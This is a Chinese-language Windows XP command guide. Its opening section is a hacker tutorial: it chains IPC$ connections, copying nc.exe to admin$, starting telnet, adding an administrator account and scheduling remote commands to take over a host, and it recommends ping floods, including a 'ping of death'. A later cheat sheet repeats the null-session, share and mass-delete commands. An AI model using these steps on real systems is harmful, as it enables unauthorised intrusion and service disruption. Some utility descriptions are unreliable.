windows XP cmd命令大全

一，ping 　　

　　它是用來檢查網絡是否通暢或者網絡連接速度的命令。作為一個生活在網絡上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網絡上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，。所示的幫助畫面。在此，我們只掌握一些基本的很有用的參數就可以了（下同）。 　　

　　-t 表示將不間斷向目標IP發送數據包，直到我們強迫其停止。試想，如果你使用100M的寬帶接入，而目標IP是56K的小貓，那么要不了多久，目標IP就因為承受不了這么多的數據而掉線，呵呵，一次攻擊就這么簡單的實現了。 　　

　　-l 定義發送數據包的大小，默認為32字節，我們利用它可以最大定義到65500字節。結合上面介紹的-t參數一起使用，會有更好的效果哦。 　　

　　-n 定義向目標IP發送數據包的次數，默認為3次。如果網絡速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那么就定義為一次吧。 　　

　　說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在后面的參數為標準，比如"ping IP -t -n 3"，雖然使用了-t參數，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。 　　

　　下面我們舉個例子來說明一下具體用法。 　　

　　這里time=2表示從發出數據包到接受到返回數據包所用的時間是2秒，從這里可以判斷網絡連接速度的大小 。從TTL的返回值可以初步判斷被ping主機的操作系統，之所以說"初步判斷"是因為這個值是可以修改的。這里TTL=32表示操作系統可能是win98。

　　（小知識：如果TTL=128，則表示目標主機可能是Win2000；如果TTL=250，則目標主機可能是Unix）

　　至于利用ping命令可以快速查找局域網故障，可以快速搜索最快的QQ服務器，可以對別人進行ping攻擊……這些就靠大家自己發揮了。 　　

二，nbtstat 　　

　　該命令使用TCP/IP上的NetBIOS顯示協議統計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網卡的MAC地址等。在此我們就有必要了解幾個基本的參數。 　　

　　-a 使用這個參數，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息（下同）。 　　

　　-A 這個參數也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。

　　-n 列出本地機器的NETBIOS信息。 　　

　　當得到了對方的IP或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們入侵的保險系數。 　　

三，netstat

　　這是一個用來查看網絡狀態的命令，操作簡便功能強大。 　　

　　-a 查看本地機器的所有開放端口，可以有效發現和預防木馬，可以知道機器所開的服務等信息，如圖4。 　　

　　這里可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等。用法：netstat -a IP。

　　-r 列出當前的路由信息，告訴我們本地機器的網關、子網掩碼等信息。用法：netstat -r IP。
四，tracert

　　跟蹤路由信息，使用此命令可以查出數據從本地機器傳輸到目標主機所經過的所有途徑，這對我們了解網絡布局和結構很有幫助。如圖5。 　　

　　這里說明數據從本地機器傳輸到192.168.0.1的機器上，中間沒有經過任何中轉，說明這兩臺機器是在同一段局域網內。用法：tracert IP。 　　

五，net 　　

　　這個命令是網絡命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是 微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車如圖6。

　　在這里，我們重點掌握幾個入侵常用的子命令。 　　

　　net view 　　

　　使用此命令查看遠程主機的所以共享資源。命令格式為net view IP。　　

　　net use

　　把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x: IPsharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接（net use IPIPC$ "password" /user:"name"）， 　　

　　建立了IPC$連接后，呵呵，就可以上傳文件了：copy nc.exe 192.168.0.7admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合后面要介紹到的其他DOS命令就可以實現入侵了。 　　

　　net start

　　使用它來啟動遠程主機上的服務。當你和遠程主機建立連接后，如果發現它的什么服務沒有啟動，而你又想利用此服務怎么辦？就使用這個命令來啟動吧。用法：net start servername，如圖9，成功啟動了telnet服務。 　　

　　net stop

　　入侵后發現遠程主機的某個服務礙手礙腳，怎么辦？利用這個命令停掉就ok了，用法和net start同。 　　

　　net user

　　查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。

　　1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。

　　2，net user abcd /del，將用戶名為abcd的用戶刪除。

　　3，net user abcd /active:no，將用戶名為abcd的用戶禁用。

　　4，net user abcd /active:yes，激活用戶名為abcd的用戶。

　　5，net user abcd，查看用戶名為abcd的用戶的情況　　

　　net localgroup

　　查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法：net localgroup groupname username /add。 　　

　　現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了，呵呵，你可以再使用net user abcd來查看他的狀態，和圖10進行比較就可以看出來。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員，這是后話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。 　　

　　net time

　　這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機里面，那么也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎？我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段（后面會講到）可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法：net time IP。 　　

六，at

這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序（知道net time的重要了吧？）。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以后的某個時間（比如2分鐘后）執行某個程序和命令。用法：at time command computer。 　　

　　表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務（這里net start telnet即為開啟telnet服務的命令）。 　　
七，ftp 　　

　　大家對這個命令應該比較熟悉了吧？網絡上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去。現在如果你掃到了一臺開放ftp服務的主機（一般都是開了21端口的機器），如果你還不會使用ftp的命令怎么辦？下面就給出基本的ftp命令使用方法。

　　首先在命令行鍵入ftp回車，出現ftp的提示符，這時候可以鍵入"help"來查看幫助（任何DOS命令都可以使用此方法查看其幫助)。 　　

　　大家可能看到了，這么多命令該怎么用？其實也用不到那么多，掌握幾個基本的就夠了。 　　

　　首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入"open 主機IP ftp端口"回車即可，一般端口默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。 　　

　　用戶名和密碼都是ftp，密碼是不顯示的。當提示**** logged in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。 　　

　　接下來就要介紹具體命令的使用方法了。 　　

　　dir 跟DOS命令一樣，用于查看服務器的文件，直接敲上dir回車，就可以看到此ftp服務器上的文件。

　　cd 進入某個文件夾。

　　get 下載文件到本地機器。

　　put 上傳文件到遠程服務器。這就要看遠程ftp服務器是否給了你可寫的權限了，如果可以，呵呵，該怎么 利用就不多說了，大家就自由發揮去吧。

　　delete 刪除遠程ftp服務器上的文件。這也必須保證你有可寫的權限。

　　bye 退出當前連接。

　　quit 同上。
　　

八，telnet

　　功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什么？它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以administrator身份連接了遠程機器后，就可以用它來干你想干的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。 　　

　　然后在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。 　　

　　當輸入用戶名和密碼都正確后就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的權限，利用DOS命令就可以實現你想干的事情了。這里我使用的超級管理員權限登陸的。　　

　　到這里為止，網絡DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網管一個印象，讓其知道熟悉和掌握網絡DOS命令的重要性。其實和網絡有關的DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網管有所幫助。學好DOS對當好網管有很大的幫助，特別的熟練掌握了一些網絡的DOS命令。

　　另外大家應該清楚，任何人要想進入系統，必須得有一個合法的用戶名和密碼（輸入法漏洞差不多絕跡了吧），哪怕你拿到帳戶的只有一個很小的權限，你也可以利用它來達到最后的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防御弱口令入侵的方法。

　　最后，由衷的說一句，培養良好的安全意識才是最重要的。

=========================================
開始→運行→命令集錦
winver 檢查Windows版本
wmimgmt.msc 打開Windows管理體系結構(wmi)
wupdmgr Windows更新程序
wscript Windows腳本宿主設置
write 寫字板
winmsd 系統信息
wiaacmgr 掃描儀和照相機向導
winchat xp自帶局域網聊天
mem.exe 顯示內存使用情況
msconfig.exe 系統配置實用程序
mplayer2 簡易widnows media player
mspaint 畫圖板
mstsc 遠程桌面連接
mplayer2 媒體播放機
magnify 放大鏡實用程序
mmc 打開控制臺
mobsync 同步命令

dxdiag 檢查directx信息
drwtsn32 系統醫生
devmgmt.msc 設備管理器
dfrg.msc 磁盤碎片整理程序
diskmgmt.msc 磁盤管理實用程序
dcomcnfg 打開系統組件服務
ddeshare 打開dde共享設置
dvdplay dvd播放器

net stop messenger 停止信使服務
net start messenger 開始信使服務
notepad 打開記事本
nslookup 網絡管理的工具向導
ntbackup 系統備份和還原
narrator 屏幕“講述人”
ntmsmgr.msc 移動存儲管理器
ntmsoprq.msc 移動存儲管理員操作請求
netstat -an （tc）命令檢查接口

syncapp 創建一個公文包
sysedit 系統配置編輯器
sigverif 文件簽名驗證程序
sndrec32 錄音機
shrpubw 創建共享文件夾
secpol.msc 本地安全策略
syskey 系統加密，一旦加密就不能解開，保護Windows xp系統的雙重密碼
services.msc 本地服務設置
sndvol32 音量控制程序
sfc.exe 系統文件檢查器
sfc /scannow windows文件保護 tsshutdn 60秒倒計時關機命令
tourstart xp簡介（安裝完成后出現的漫游xp程序）
taskmgr 任務管理器

eventvwr 事件查看器
eudcedit 造字程序
explorer 打開資源管理器

packager 對象包裝程序
perfmon.msc 計算機性能監測程序
progman 程序管理器

regedit.exe 注冊表
rsop.msc 組策略結果集
regedt32 注冊表編輯器
rononce -p 15秒關機
regsvr32 /u *.dll 停止dll文件運行
regsvr32 /u zipfldr.dll 取消zip支持

cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁盤檢查
certmgr.msc 證書管理實用程序
calc 啟動計算器
charmap 啟動字符映射表
cliconfg sql server 客戶端網絡實用程序
clipbrd 剪貼板查看器
conf 啟動netmeeting
compmgmt.msc 計算機管理
cleanmgr 垃圾整理
ciadv.msc 索引服務程序

osk 打開屏幕鍵盤
odbcad32 odbc數據源管理器
oobe/msoobe /a 檢查xp是否激活
lusrmgr.msc 本機用戶和組
logoff 注銷命令

iexpress 木馬捆綁工具，系統自帶

nslookup ip地址偵測器

fsmgmt.msc 共享文件夾管理器

utilman 輔助工具管理器

gpedit.msc 組策略

以下為Windows操作系統的常用運行命令,執行這些命令,就能打開系統對應的相關實用程序,如果大家能基本利用,就能檢查并修復系統的最基本的故障,除注銷,關閉系統命令外,其它所有命令,大家不妨一試!!

運行輸入CMD輸入 對應的相關實用程序:
. 打開C:＼Documents and Settings＼XXX(當前登錄Windows XP的用戶名)
.. 打開Windows XP所在的盤符下的Documents and Settings文件夾
... 打開“我的電腦”選項。
accwiz.exe 輔助工具向導
actmovie.exe 直接顯示安裝工具
append.exe 允許程序打開制定目錄中的數據
arp.exe 顯示和更改計算機的IP與硬件物理地址的對應列表
at.exe 計劃運行任務
atmadm.exe ATM調用管理器統計
attrib.exe 顯示和更改文件和文件夾屬性
autochk.exe 檢測修復文件系統 (XP不可用)
autoconv.exe 在啟動過程中自動轉化系統 (XP不可用)
autofmt.exe 在啟動過程中格式化進程 (XP不可用)
autolfn.exe 使用長文件名格式 (XP不可用)
arp.exe 顯示和更改計算機的IP與硬件物理地址的對應
calc.exe 計算器
Bootvrfy.exe 通報啟動成功
cacls.exe 顯示和編輯ACL
cdplayer.exe CD播放器
change.exe 與終端服務器相關的查詢 (XP不可用)
charmap.exe 字符映射表
chglogon.exe 啟動或停用會話記錄 (XP不可用)
chgport.exe 改變端口（終端服務） (XP不可用)
chgusr.exe 改變用戶（終端服務） (XP不可用)
chkdsk.exe 磁盤檢測程序
chkntfs.exe NTFS磁盤檢測程序
cidaemon.exe 組成Ci文檔服務
cipher.exe 在NTFS上顯示或改變加密的文件或目錄
cisvc.exe 打開索引內容
ckcnv.exe 變換Cookie
cleanmgr.exe 磁盤清理
cliconfg.exe SQL客戶網絡工具
clipbrd.exe 剪貼簿查看器
clipsrv.exe 運行Clipboard服務
clspack.exe 建立系統文件列表清單
cluster.exe 顯示域的集群 (XP不可用)
cmd.exe 進2000XP DOS
cmdl32.exe 自動下載連接管理
cmmgr32.exe 連接管理器
cmmon32.exe 連接管理器監視
cmstp.exe 連接管理器配置文件安裝程序
comclust.exe 集群
comp.exe 比較兩個文件和文件集的內容
conf??啟動netmeeting聊天工具
control userpasswords2 XP密碼管理.
compmgmt.msc 計算機管理
cprofile.exe 轉換顯示模式 (XP不可用)
開始,運行,輸入CMD輸入net config workstation計算機名 完整的計算機名用戶名
工作站處于活動狀態（即網絡描述） 軟件版本（即軟件版本號） 工作站域 工作站域的 DNS 名稱
登錄域 COM 打開時間超時（秒） COM 發送量（字節） COM 發送超時 (msec)
CMD輸入net config workstation 更改可配置工作站服務設置。
CMD輸入net config server 可以顯示不能配置的下服務器計算機名 服務器注釋 服務器版本（即軟件版本號）
服務器處于活動狀態（即網絡描述） 服務器處于隱藏狀態（即 /hidden 設置）
最大登錄用戶數（即可使用服務器共享資源的最大用戶數）
每個會話打開文件的最大數（即用戶可在一個會話中打開服務器文件的最大數）
空閑會話時間（最小值）
chkdsk.exe 磁盤檢查.
Chkdsk /r 2000命令控制臺中的Chkdsk /r命令檢查修復系統文件
cleanmgr 垃圾整理
Clipbrd 剪貼板查看器
C:boot.ini 打開啟動菜單
compact.exe 顯示或改變NTFS分區上文件的壓縮狀態
conime.exe IME控制臺
control.exe 控制面板
convert.exe NTFS 轉換文件系統到NTFS
convlog.exe 轉換IIS日志文件格式到NCSA格式
cprofile.exe 轉換顯示模式
cscript.exe 較本宿主版本
csrss.exe 客戶服務器Runtime進程 (XP不可用)
csvde.exe 格式轉換程序 (XP不可用)
dcpromo 活動目錄安裝(XP不可用)
drwtsn32 系統醫生
diskmgmt.msc 磁盤管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 設備管理器(檢查電腦硬件,驅動)
dxdiag 檢查DirectX信息
dcomcnfg.exe DCOM配置屬性 (控制臺根目錄)
dcpromo.exe 安裝向導 (XP不可用)
ddeshare.exe DDE共享
debug.exe 檢查DEBUG
dfrgfat.exe FAT分區磁盤碎片整理程序
dfrgntfs.exe NTFS分區磁盤碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS樹 (XP不可用)
dfsinit.exe 分布式文件系統初始化(XP不可用)
dfssvc.exe 分布式文件系統服務器 (XP不可用)
diantz.exe 制作CAB文件
diskperf.exe 磁盤性能計數器
dmremote.exe 磁盤管理服務的一部分 (XP不可用)
doskey.exe 命令行創建宏
dosx.exe DOS擴展
dplaysvr.exe 直接運行幫助 (XP不可用)
drwatson.exe 華生醫生錯誤檢測
drwtsn32.exe 華生醫生顯示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X診斷工具
edlin.exe 命令行的文本編輯
esentutl.exe MS數據庫工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 轉換EXE文件到二進制
expand.exe 解壓縮
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夾
fastopen.exe 快速訪問在內存中的硬盤文件
faxcover.exe 傳真封面編輯
faxqueue.exe 顯示傳真隊列
faxsend.exe 發送傳真向導
faxsvc.exe 啟動傳真服務
fc.exe 比較兩個文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一個用戶并顯示出統計結果
fixmapi.exe 修復MAPI文件
flattemp.exe 允許或者禁用臨時文件目錄 (XP不可用)
fontview.exe 顯示字體文件中的字體
forcedos.exe 強制文件在DOS模式下運行
ftp.exe FTP下載
gpedit.msc 組策略
gdi.exe 圖形界面驅動
grpconv.exe 轉換程序管理員組
hostname.exe 顯示機器的Hostname
Internat 輸入法圖標
iexpress 木馬捆綁工具，系統自帶
ieshwiz.exe 自定義文件夾向導
iexpress.exe iexpress安裝包
iisreset.exe 重啟IIS服務(未安裝IIS,不可用)
internat.exe 鍵盤語言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全監視器
ipxroute.exe IPX路由和源路由控制程序
irftp.exe 無線連接
ismserv.exe 安裝或者刪除Service Control Manager中的服務
jdbgmgr.exe Java4的調試器
jetconv.exe 轉換Jet Engine數據庫 (XP不可用)
jetpack.exe 壓縮Jet數據庫 (XP不可用)
jview.exe Java的命令行裝載者
label.exe 改變驅動器的卷標
lcwiz.exe 許可證向導 (XP不可用)
ldifde.exe LDIF目錄交換命令行管理 (XP不可用)
licmgr.exe 終端服務許可協議管理 (XP不可用)
lights.exe 顯示連接狀況 (XP不可用)
llsmgr.exe Windows 2000 許可協議管理 (XP不可用)
llssrv.exe 啟動許可協議服務器 (XP不可用)
locator.exe RPC Locator 遠程定位
lodctr.exe 調用性能計數
logoff.exe 注銷當前用戶
lpq.exe 顯示遠端的LPD打印隊列的狀態，顯示被送到基于Unix的服務器的打印任務
lpr.exe 用于Unix客戶打印機將打印任務發送給連接了打印設備的NT的打印機服務器。
lsass.exe 運行LSA和Server的DLL
lserver.exe 指定默認Server新的DNS域 (XP不可用)
lusrmgr.msc 本地賬戶管理
mmc 控制臺
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大鏡
makecab.exe 制作CAB文件
mem.exe 顯示內存狀態
migpwd.exe 遷移密碼
mmc.exe 控制臺
mnmsrvc.exe 遠程桌面共享
mobsync.exe 同步目錄管理器
mountvol.exe 創建、刪除或列出卷的裝入點。
mplay32.exe Media Player 媒體播放器
mpnotify.exe 通知應用程序
mqbkup.exe 信息隊列備份和恢復工具
mqmig.exe MSMQ Migration Utility 信息隊列遷移工具
mrinfo.exe 使用SNMP多點傳送路由
mscdexnt.exe 安裝MSCD
msdtc.exe 動態事務處理控制臺
msg.exe 發送消息到本地或遠程客戶
mshta.exe HTML應用程序主機
msiexec.exe 開始Windows安裝程序
mspaint.exe 打開畫圖板
mstask.exe 任務計劃表程序
mstinit.exe 任務計劃表安裝
Msconfig.exe 系統配置實用程序 (配置啟動選項,服務項)
mem.exe 顯示內存使用情況
mspaint 畫圖板
Net Stop Messenger 停止信使服務
Net Start Messenger 恢復信使服務
nslookup 網絡管理的工具
Nslookup IP 地址偵測器
ntbackup 系統備份和還原
nbtstat.exe 使用 NBT（TCP/IP 上的 NetBIOS）顯示協議統計和當前 TCP/IP 連接。
nddeapir.exe NDDE API服務器端
netsh.exe 用于配置和監控 Windows 2000 命令行腳本接口(XP不可用)
netstat.exe 顯示協議統計和當前的 TCP/IP 網絡連接。
nlsfunc.exe 加載特定國家的信息。Windows 2000 和 MS-DOS 子系統不使用該命令接受該命令只是為了與 MS-DOS 文件兼容。
notepad.exe 打開記事本
nslookup.exe 該診斷工具顯示來自域名系統 (DNS) 名稱服務器的信息。
ntbackup.exe 備份和故障修復工具
ntfrs.exe NT文件復制服務 (XP不可用)
ntvdm.exe 模擬16位Windows環境
nw16.exe NetWare轉向器
nwscript.exe 運行Netware腳本
odbcad32.exe 32位ODBC數據源管理 (驅動程序管理)
odbcconf.exe 命令行配置ODBC驅動和數據源
packager.exe 對象包裝程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 檢查Pentium的浮點錯誤
perfmon.exe 系統性能監視器
ping.exe 驗證與遠程計算機的連接
posix.exe 用于兼容Unix
print.exe 打印文本文件或顯示打印隊列的內容。
progman.exe 程序管理器
psxss.exe Posix子系統應用程序
qappsrv.exe 在網絡上顯示終端服務器可用的程序
qprocess.exe 在本地或遠程顯示進程的信息（需終端服務）
query.exe 查詢進程和對話 (XP不可用)
quser.exe 顯示用戶登陸的信息（需終端服務）
qwinsta.exe 顯示終端服務的信息
rononce -p 15秒關機
rasAdmin 遠程訪問服務.
regedit.exe 注冊表編輯器
rasadmin.exe 啟動遠程訪問服務 (XP不可用)
rasautou.exe 建立一個RAS連接
rasdial.exe 寬帶,撥號連接
ras.exe 運行RAS連接 (XP不可用)
rcp.exe 計算機和運行遠程外殼端口監控程序 rshd 的系統之間復制文件
rdpclip.exe 終端和本地復制和粘貼文件
recover.exe 從壞的或有缺陷的磁盤中恢復可讀取的信息。
redir.exe 運行重定向服務
regedt32.exe 32位注冊服務
regini.exe 用腳本修改注冊許可
regwiz.exe 注冊向導
replace.exe 用源目錄中的同名文件替換目標目錄中的文件。
rexec.exe rexec 命令在執行指定命令前，驗證遠程計算機上的用戶名，只有安裝了 TCP/IP 協議后才可以使用該命令。
risetup.exe 運行遠程安裝向導服務 (XP不可用)
route.exe 控制網絡路由表
rsh.exe 在運行 RSH 服務的遠程計算機上運行命令
rsnotify.exe 遠程存儲通知回顯
runas.exe 允許用戶用其他權限運行指定的工具和程序
rundll32.exe 啟動32位DLL程序
rwinsta.exe 重置會話子系統硬件和軟件到最初的值
Sndvol32 音量控制程序
sfc.exe 或CMD sfc.exe 回車 系統文件檢查器
services.msc 網絡連接服務
syskey 系統加密，(一旦加密就不能解開，保護windows xp系統的雙重密碼wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢復最近的注冊表
secedit.exe 自動化安全性配置管理
services.exe 控制所有服務
sethc.exe 設置高對比
setver.exe 設置 MS-DOS 子系統向程序報告的 MS-DOS 版本號
sfc.exe 系統文件檢查
shadow.exe 監控另外一臺中端服務器會話
shrpubw.exe 建立和共享文件夾
sigverif.exe 文件簽名驗證
smlogsvc.exe 性能日志和警報 (XP不可用)
sndrec32.exe 錄音機
sndvol32.exe 顯示聲音控制信息
snmp.exe 簡單網絡管理協議 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 服務器管理器 (XP不可用)
subst.exe 將路徑與驅動器盤符關聯
sysedit.exe 系統配置編輯器
syskey.exe NT賬號數據庫加密工具
sysocmgr.exe > Windows 安裝程序
systray.exe 在低權限運行systray
taskmgr 任務管理器
tasklist /svc(CMD)了解每個SVCHOST進程到底提供了多少系統服務(200098不可用)
tlist -S(CMD) 了解每個SVCHOST進程到底提供了多少系統服務(
taskman.exe 任務管理器 (XP不可用)
taskmgr.exe 任務管理器
tcmsetup.exe 電話服務客戶安裝
tcpsvcs.exe TCP服務
termsrv.exe 終端服務
tftp.exe 將文件傳輸到正在運行 TFTP 服務的遠程計算機或從正在運行 TFTP 服務的遠程計算機傳輸文件
themes.exe 桌面主題 (XP不可用)
tlntadmn.exe Administrator Telnet服務管理
tlntsess.exe 顯示目前的Telnet會話
tlntsvr.exe 開始Telnet服務
tracert.exe 診斷實用程序將包含不同生存時間 (TTL) 值的 Internet 控制消息協議 (ICMP) 回顯數據包發送到目標，以決定到達目標采用的路由
tsadmin.exe Administrator 終端服務管理器 (XP不可用)
tscon.exe 粘貼用戶會話到終端對話
tsdiscon.exe 斷開終端服務的用戶
tskill.exe 殺掉終端服務
tsprof.exe 用終端服務得出查詢結果
tsshutdn.exe 關閉系統
unlodctr.exe 性能監視器的一部分
upg351db.exe 升級Jet數據庫 (XP不可用)
ups.exe UPS service UPS服務
user.exe Windows核心服務
userinit.exe 打開我的文檔
usrmgr.exe 域用戶管理器
utilman.exe 指定2000啟動時自動打開那臺機器
vwipxspx.exe 調用IPX/SPX VDM
w32tm.exe 時間服務器
wextract.exe 解壓縮Windows文件
winchat.exe 打開Windows聊天工具
winhlp32.exe 運行幫助系統
winmsd.exe 查看系統信息
winver.exe 顯示Windows版本
wizmgr.exe Windows管理向導 (XP不可用)
wjview.exe Java 命令行調用Java
write.exe 打開寫字板
wscript.exe 腳本工具
wupdmgr.exe Windows update 運行Windows update升級向導
winver 檢查Windows版本
Win98系統工具
開始,運行,輸入Msconfig 系統配置實用工具 配置啟動選項，包括config.sys、autoexec.bat、win.ini、system.ini和注冊表及程序菜單中的啟動項。并可設置是否故障啟動。
開始,運行,輸入Regedit 注冊表修改工具 注冊表編輯器，如果沒有把握不要隨意修改注冊表！
開始,運行,輸入Regsvr32 dll注冊工具 當提示找不到dll文件時，可用此來注冊該動態連接庫。
開始,運行,輸入Regwiz 注冊向導 用于注冊。校驗系統文件，并可恢復系統文件。
如果啟動時出現類似*.vxd文件錯誤，可用此恢復該vxd文件。
開始,運行,輸入Scandskw 磁盤掃描程序,用于掃描修復磁盤。如果磁盤或文件出現錯誤，可用來初步修復。
開始,運行,輸入DxDiag DirectX診斷工具可用于檢測DirectX運行是否正常。
開始,運行,輸入NETSCAPE

ESC：清除當前命令行；
F7：顯示命令歷史記錄，以圖形列表窗的形式給出所有曾經輸入的命令，并可用上下箭頭鍵選擇再次執行該命令。
F8：搜索命令的歷史記錄，循環顯示所有曾經輸入的命令，直到按下回車鍵為止；
F9：按編號選擇命令，以圖形對話框方式要求您輸入命令所對應的編號(從0開始)，并將該命令顯示在屏幕上；
Ctrl+H：刪除光標左邊的一個字符；
Ctrl+C Ctrl+Break，強行中止命令執行；
Ctrl+M：表示回車確認鍵；
Alt+F7：清除所有曾經輸入的命令歷史記錄；
Alt+PrintScreen：截取屏幕上當前命令窗里的內容。
病毒破壞了系統文件，請使用殺毒軟件查殺病毒，然后利用Windows 2000提供的“命令控制臺”中的Chkdsk /r命令檢查修復系統文件即可
DOS命令字典..收藏

net use ipipc$ " " /user:" " 建立IPC空鏈接

net use ipipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接

net use h: ipc$ "密碼" /user:"用戶名" 直接登陸后映射對方C：到本地為H:

net use h: ipc$ 登陸后映射對方C：到本地為H:

net use ipipc$ /del 刪除IPC鏈接

net use h: /del 刪除映射對方到本地的為H:的映射

net user 用戶名 密碼 /add 建立用戶

net user guest /active:yes 激活guest用戶

net user 查看有哪些用戶

net user 帳戶名 查看帳戶的屬性

net localgroup ***istrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權限,注意：***istrator后加s用復數

net start 查看開啟了哪些服務

net start 服務名 開啟服務；(如:net start telnet， net start schedule)

net stop 服務名 停止某服務

net time 目標ip 查看對方時間

net time 目標ip /set 設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息

net view 查看本地局域網內開啟了哪些共享

net view ip 查看對方局域網內開啟了哪些共享

net config 顯示系統網絡設置

net logoff 斷開連接的共享

net pause 服務名 暫停某服務

net send ip "文本信息" 向對方發信息

net ver 局域網內正在使用的網絡連接類型和信息

net share 查看本地開啟的共享

net share ipc$ 開啟ipc

net share ipc$ /del 刪除ipc

net share c$ /del 刪除C：共享

net user guest 12345 用guest用戶登陸后用將密碼改為12345

net password 密碼 更改系統登陸密碼

netstat -a 查看開啟了哪些端口,常用netstat -an

netstat -n 查看端口的網絡連接情況，常用netstat -an

netstat -v 查看正在進行的工作

netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）

netstat -s 查看正在使用的所有協議使用情況

nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫

tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：“-w數字”用于設置超時間隔。

ping ip(或域名) 向對方主機發送默認大小為32字節的數據，參數：“-l[空格]數據包大小”；“-n發送數據次數”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(發送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數“/all”顯示全部配置信息

tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)

kill -F 進程名 加-F參數后強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)

del -F 文件名 加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件

#2 二：

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）

move 盤符路徑要移動的文件名 存放移動文件的路徑移動后文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋

